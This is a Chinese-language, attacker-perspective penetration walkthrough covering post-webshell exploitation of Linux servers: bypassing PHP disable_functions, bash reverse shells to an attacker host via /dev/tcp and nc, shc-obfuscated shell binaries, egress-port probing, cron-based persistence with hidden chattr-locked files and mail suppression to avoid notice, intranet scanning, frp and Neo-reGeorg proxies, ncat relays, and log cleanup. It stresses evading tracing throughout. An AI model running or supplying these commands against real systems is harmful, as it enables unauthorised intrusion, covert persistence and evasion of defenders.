繞php的disable_functions 此處建議用AntSword的官方繞過插件全自動繞



繞過失敗的可以手動試一下

另外,可以看一下web程序存的數(shù)據(jù)庫的用戶名和密碼,然后看一下數(shù)據(jù)庫能不能利用,比如寫文件或者寫日志,以及各種提權(quán),如果繞過disable_functions失敗,數(shù)據(jù)庫也不能利用的可以看一下目標服務(wù)器上都有什么文件,比如其他站點或者其他可以利用的東西,如果限制了訪問目錄那就只能留著以后再看了

隱藏ip

隱藏攻擊ip還是很重要的,不然容易被溯源,可以上cdn或者用云函數(shù)等 但是此處也是有大坑的,能訪問國外服務(wù)器的目標機器就好辦了,直接上就行,但是不能訪問國外服務(wù)器的目標機器,首先用Cloudflare比較卡,其次用國內(nèi)的云服務(wù)商的則需要實名,而且費用也不低,所以實在沒辦法就別隱藏ip了,此處我也沒有隱藏ip

加密bash反彈shell

正常的bash反彈shell: 目標機器反彈shell:

bash -i >& /dev/tcp/攻擊機的ip/攻擊機接收shell的端口 0>&1

攻擊機接收反彈來的shell:

nc -lvvp 攻擊機接收shell的端口

//netcat版本低時l和p參數(shù)不兼容,可以nc -lvv port監(jiān)聽端口

這個repository加密一下bash腳本,加密后會生成一個c源代碼文件和編譯之后的二進制文件,把編譯之后的二進制文件傳到目標機器上執(zhí)行就行了,可以彌補一下目標機器在國內(nèi)時不便于隱藏攻擊ip的缺陷

本地執(zhí)行:

./shc -Uvrf reverse.sh -o reverse

把生成的reveser傳到目標機器上,執(zhí)行:

./reverse

webshell提供的shell環(huán)境限制很多,所以最好先反彈shell,盡量不要正向連接shell,開個端口動靜太大

首先是不能彈shell的情況,比如相關(guān)的bash,nc等命令都被限制了,那先嘗試提權(quán)

能彈shell但是接收不到的時候,可以看一下目標是不是限制出網(wǎng)或者限制出站端口

如果限制出網(wǎng)那就先嘗試提權(quán),如果限制出站端口可以批量試一下常見的端口,在自己的vps上,通過nginx監(jiān)聽多個端口來快速啟動多個端口,然后再在目標機器上上傳個sh腳本,批量curl自己vps的指定端口,最后看一下結(jié)果就可以了,nmap ---top-ports 100或1000可以掃描nmap整理的100或1000個最常用的端口,可以參考一下

測試出網(wǎng)端口的具體步驟:

1.在正常的nginx配置文件中找到listen port,在后面復制一行,把port改成自己想開放的端口,重啟nginx

2.寫一個sh腳本,內(nèi)容就是每行都curl想測試的端口:curl vps:port

3.傳到目標機器上,運行并且重定向到文件里:./shfile > result.txt

4.查看result.txt中的結(jié)果,就可以看到哪些端口能出網(wǎng),nmap ---top-ports 100和nmap ---top-ports 1000可以查看nmap整理的100和1000個最常用的端口,可以參考一下

成功收到shell的時候,依舊是個很難用的shell,可以再升級成完全的shell再用,升級之后和真實shell一樣,非常舒服

# 攻擊機本地執(zhí)行# 首先檢查當前終端和STTY信息$ echo $TERM$ stty -a# 查看輸出的rows和columns,后面配置用

此處的這些操作是重復性的,和具體設(shè)備無關(guān),所以用xshell的可以寫個xshell的腳本或者錄制個xshell的腳本,不過我這邊錄制的時候生成的腳本內(nèi)容總是為空,應(yīng)該是個bug,也沒時間研究寫xshell的腳本了,所以直接用按鍵精靈寫了個

畢竟按鍵精靈只是模仿輸入,不能獲取到結(jié)果,所以每一步都是只輸入,不回車,需要自己回車,而且每一次輸入之后會多監(jiān)聽一次任意按鍵事件,以防想暫停

如果想把這個shell關(guān)了,或者這個shell接收到了內(nèi)網(wǎng)的其他shell,然后想把接收到的其他shell關(guān)了,需要輸入兩次exit退出,然后可能shell的格式是亂的,這時候reset一下就好了

在攻擊機上肯定不可能直接就接收shell,如果本地和攻擊機的shell連接斷了,那么攻擊機和目標機器的shell也就斷了,或者想把攻擊機接收到的shell掛在后臺,也不能直接接收shell,此處我推薦使用screen,類似于windows下的多窗口,接收shell的時候新開一個screen掛在后臺,不用的時候就在后臺掛著,用的時候切過去用就可以了

screen的簡單使用教程:

1.screen -S 這個screen會話的名字創(chuàng)建一個screen

2.在screen的會話中時,快捷鍵ctrl+a,ctrl+d把當前screen放在后臺

3.screen -r screen會話的名字恢復一個screen

4.在screen的會話中exit可以退出screen

5.一些小技巧:

1.`screen -list`查看所有的screen會話

2.`screen -list`會顯示相應(yīng)對話的pid,通過`kill -9 pid`也可以關(guān)閉相應(yīng)的screen會話

3.`screen -d screen會話的名字`可以將一個正在活動的screen放到后臺

4.如果在screen中嵌套了screen,那么快捷鍵ctrl+a,ctrl+a,ctrl+d可以把第二層screen放在第一層的后臺,快捷鍵ctrl+a,ctrl+d是不論嵌套幾層screen都會把最外層的screen放在后臺的

低權(quán)限提權(quán)

首先是信息收集,看一下/proc/version和/etc/*-release,然后在google和Exploit Database上找一下,同時看看打沒打補丁,如果目標機器不能編譯的話可以在自己的機器上編譯好了傳過去 此處也發(fā)現(xiàn)了幾個提權(quán)工具,不過我試了一下不是很好用,都是靠版本來判斷的,和手動搞一樣

權(quán)限維持

切記要做持久化,不然辛辛苦苦拿的shell可能就要重新拿或者沒了,方法很多,可以google搜一下,與時俱進,用最新的東西,下面是一種我常用的權(quán)限維持的方式:

cron計劃任務(wù)權(quán)限維持比較簡單,當然也比較明顯:

建議用前面說的shc加密,上傳生成的二進制文件,用這個二進制文件彈shell,安全性高一點

上傳之后:

1.先chmod +x 二進制文件給一下權(quán)限

2.然后在名字前面加個.變?yōu)殡[藏文件(ls -a可以查看隱藏文件)

3.再嘗試一下chattr +i 二進制文件(chattr -i 二進制文件可以解除鎖定)防止刪除,有相應(yīng)的權(quán)限才能成功執(zhí)行這條命令

4.最后把這個文件放在安全又隱秘的位置,

配置cron計劃任務(wù)時,如果是root用戶,那就在/etc/crontab里添加,如果不是root用戶,那就用crontab -e添加,注意crontab -e需要交互式shell,理論上來說非root用戶的cron存在/var/spool/crond下(CentOS),可以直接編輯相應(yīng)的文件,但是非root用戶通常沒有權(quán)限直接編輯,所以還是需要獲取交互式shell然后crontab -e添加

root用戶在/etc/crontab里添加的計劃任務(wù),通過crontab -l或crontab -e是看不到的

/etc/crontab里應(yīng)該有默認的配置和默認的例子,crontab -e沒有,不管是怎么寫cron,都建議使用以下配置:

在寫cron之前先執(zhí)行$PATH查看環(huán)境變量并復制,然后再寫cron

首先第一行配置為SHELL=+相應(yīng)的shell位置,第二行配置為PATH=+默認的(如果有的話)加上前面的$PATH,第三行配置為MAILTO="",第三行的意義是計劃任務(wù)的執(zhí)行結(jié)果不給用戶發(fā)郵件,因為計劃任務(wù)反彈shell是不停的反彈,但是攻擊機如果之前接收到的shell還沒關(guān)端口被占用著彈shell就失敗了就會報錯然后發(fā)郵件,發(fā)了郵件的話每次執(zhí)行命令都會提示,很容易就被發(fā)現(xiàn)了

最后配置計劃任務(wù):

root用戶配置為* * * * * root /要執(zhí)行的命令或文件

非root用戶配置為* * * * * /要執(zhí)行的命令或文件

如果要修改執(zhí)行的間隔可以研究一下cron的語法,上面的是每分鐘彈一次shell

內(nèi)網(wǎng)

信息收集

激動人心的時刻來了,打內(nèi)網(wǎng) 因為我拿到的shell都是linux下的,沒有類似windows上的域控等等,所以此處就掃掃端口,此處可以用nmap,也可以用fscan,強烈推薦fscan,用一次就上癮,很好用

搭建代理

有些內(nèi)網(wǎng)ip的端口上跑的比如網(wǎng)站等等在命令行不太好滲透,而且有些內(nèi)網(wǎng)ip是不出網(wǎng)的,只能通過我們打下來的這個邊界服務(wù)器來訪問,所以建個代理還是很有必要的

此處我推薦用frp,然后依舊遵循動靜小點的原則,不在目標機器上開端口,在自己的vps上架設(shè)frp的服務(wù)端,在目標機器上架設(shè)frp的客戶端,然后在客戶端啟用socks5代理插件,這會在服務(wù)端上開一個你指定的端口用來做socks5代理,可以配置用戶名和密碼,還可以遠程連接,同時可以搭配其他軟件做ip的黑白名單,非常好用,本地配置代理Windows建議用Proxifier,Linux建議用proxychains-ng(proxychains4)

另外也可以用Neo-reGeorg,直接上傳個php/jsp等文件就可以建socks5代理,也很好用,對比frp一個優(yōu)點是只傳文件不用執(zhí)行命令就可以建代理,另一個優(yōu)點是不用在目標機器上額外在后臺掛一個程序

內(nèi)網(wǎng)滲透

其實和前面的web滲透一樣,只不過有些應(yīng)用在內(nèi)網(wǎng)比較常見,所以需要去了解一下,搜一下有什么漏洞

fscan本身會檢測漏洞,比如各種未授權(quán)訪問,也會爆破一些端口的服務(wù),比如mysql,ssh或者Tomcat的Manager App的弱口令等

一個C段可以見識不少東西,打了一遍下來竟然天亮了...一天一夜過去了

具體就不細說了,遇見哪個搜哪個,這個C段遇到的web程序基本都是java系的,還有一些python系的

內(nèi)網(wǎng)不出網(wǎng)反彈shell

目標機器如果不出網(wǎng)可以反彈到已經(jīng)打下來的內(nèi)網(wǎng)機器上,也可以再把反彈的端口轉(zhuǎn)發(fā)到vps上,實現(xiàn)通過轉(zhuǎn)發(fā)出網(wǎng)

通過ncat轉(zhuǎn)發(fā)出網(wǎng):

中轉(zhuǎn)的機器執(zhí)行:

ncat -l 中轉(zhuǎn)機器接收內(nèi)網(wǎng)反彈來的shell的端口 -c 'ncat 攻擊機的ip 攻擊機的端口'

這樣攻擊機就可以接收到不出網(wǎng)的設(shè)備彈的shell,唯一的缺點就是中轉(zhuǎn)的機器要占用個端口 中不中轉(zhuǎn)對于不出網(wǎng)的設(shè)備的權(quán)限維持都是一樣的,主要的區(qū)別就是在vps上連不出網(wǎng)的設(shè)備方便點

痕跡清理

主要是命令的歷史記錄和日志文件,不過基本清不干凈,而且有些地方記錄了也清不到,隱藏攻擊ip比較萬能

下面是一個簡單粗暴的清理方式,如無必要不建議使用:

審核編輯：劉清